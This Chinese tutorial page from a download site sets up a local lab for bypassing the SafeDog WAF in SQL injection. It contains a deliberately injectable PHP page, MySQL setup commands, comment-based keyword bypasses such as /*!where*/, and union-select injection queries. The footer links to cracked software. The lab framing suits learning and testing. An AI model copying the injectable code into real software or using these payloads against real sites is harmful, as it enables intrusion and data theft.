ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全网络安全文章 → fuzz自动bypass waf【黑客技术文章&网络安全技术文章】

fuzz自动bypass waf【黑客技术文章&网络安全技术文章】

时间:2018-02-09 15:16:12人气:作者:本站作者我要评论

0×00 前言

黑客刚接触安全这块时候遇到注入有WAF的网站时候无从下手,寻找各种有关绕过waf的文章,在网页浏览器上使用SQL语句为了绕过WAF变了个法加了些特殊的数字注释符就懵了,当然最后经过精心构造的SQL语句,数据库必须也得能识别并执行。本文主要介绍如何在本地安装软WAF并使用Python写的Fuzz脚本自动化绕过WAF并结合跑出来的Payload语句绕过安全防护软件。文章写的比较细主要分享下,更多细节方面请参考上篇文章全方位绕过软WAF攻略。

找一些奇葩的语句还可以执行的,或者自己能构造的,说的简单点就和密码爆破一样有些人字典强就可以扫到各种强悍的弱口令,Fuzz跑组合就有姿势了。

0×01 安全狗安装

访问: http://www.safedog.cn/website_safedog.html

选择自己的平台和web容器,我的是windows平台,Apacheweb容器,所以我就下载windows apache版。

这里自定义路径,将开机自启动关闭

fuzz自动bypass waf【黑客技术文章&网络安全技术文章】

如果是使用phpstudy的话,请将运行模式改成系统服务,不然前面安全狗的插件会安装不上

fuzz自动bypass waf【黑客技术文章&网络安全技术文章】

0×02 安全狗卸载

这里讲下细节部分卸载安全狗后出现的问题,启动Apache会发生错误:

在Apache的conf目录下有这样一个文件,SafeDogSiteApacheFilter.Conf,当然当您卸载以后可能这个文件也随之删除了,但是http.conf文件中还有这样一段:Include “d:/wamp/apache24/conf/SafeDogSiteApacheFilter.Conf”,我们只需要删除这段话就可以让apache成功的启动了

SQL注入代码:

<?php
header('content-type:text/html;chaset=utf-8');
ini_set('display_errors',0);
$mysqli = new mysqli('localhost', 'root','root','fkt');
$sql = "select * from new where id=".$_GET["id"];
$result = $mysqli->query($sql);
if($result === false){//执行失败
    echo $mysqli->error;
    echo $mysqli->errno;
}
echo '<hr><table border="1px" align="center">';
echo '<tr><th>ID</th><th>a</th><th>fkt</th></tr>';
while($row = $result->fetch_assoc()){
echo '<tr>';
    echo '<td>'.$row['id'].'</td>';
    echo '<td>wait</td>';
    echo '<td>'.$row['content'].'</td>';
    echo '</tr>';
}
echo '</table>';
$mysqli->close();
?>

mysql语句:

mysql> create database fkt;
Query OK, 1 row affected (0.00 sec)
mysql> use fkt;
Database changed
mysql> CREATE TABLE new(
    ->     id int not null,
    ->     content char(20)
    -> );
Query OK, 0 rows affected (0.19 sec)
mysql> insert into new
    -> values(
    -> '1','xiaobai');
Query OK, 1 row affected (0.02 sec)

0×03 mysql模拟注入查询

mysql的注释有三种方式:

1、块注释:/*  ….. */
2、行注释:#
3、行注释:– (–%20,注意后面有一个空格,与SQL标准稍有差别)

自MySQL3.23 版以来,可在C 风格的注释中“隐藏” MySQL特有的关键字,注释以“/ * !”而不是以“ / *”起头

现在我们在mysql命令行中执行一下SQL语句:

Select * from news where id=1
Select * from news /*!where*/id=1

我们来看下在命令行下执行的结果:

fuzz自动bypass waf【黑客技术文章&网络安全技术文章】

还是可以正常的查询出内容,我们在mysql命令行中进行下联合查询注入:Order by N

Select * from new where id =1 order by 1Select * from new where id =1 order by 2

使用mysql联合查询步骤,模拟SQL注入回显数据

select * from new where id=1 union all select null,null;
select * from new where id=1 and 1=2 union all select null,null;
select * from new where id=1 and 1=2 union all select user(),null;

相关文章

猜你喜欢

  • Ougishi绿色版下载 V4.00 中文版

    2020-06-19 / 561k

  • 谷歌地图下载助手睿智版破解下载 V9.5绿色版

    2020-06-19 / 32.7M

  • OfficeFIX中文破解版V6.110 注册版

    2020-06-19 / 26.8M

  • Plotagraph破解版V1.2.0 免费版 32/64位

    2020-06-19 / 31.5M

  • IP查详细地址工具下载 V1.1 官方免费版

    2020-06-19 / 408K

  • 内存扫把中文版下载V1.97绿色版

    2020-06-19 / 1.3M

网友评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 蜀ICP备19039426号-2| 蜀ICP备19039426号-2

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网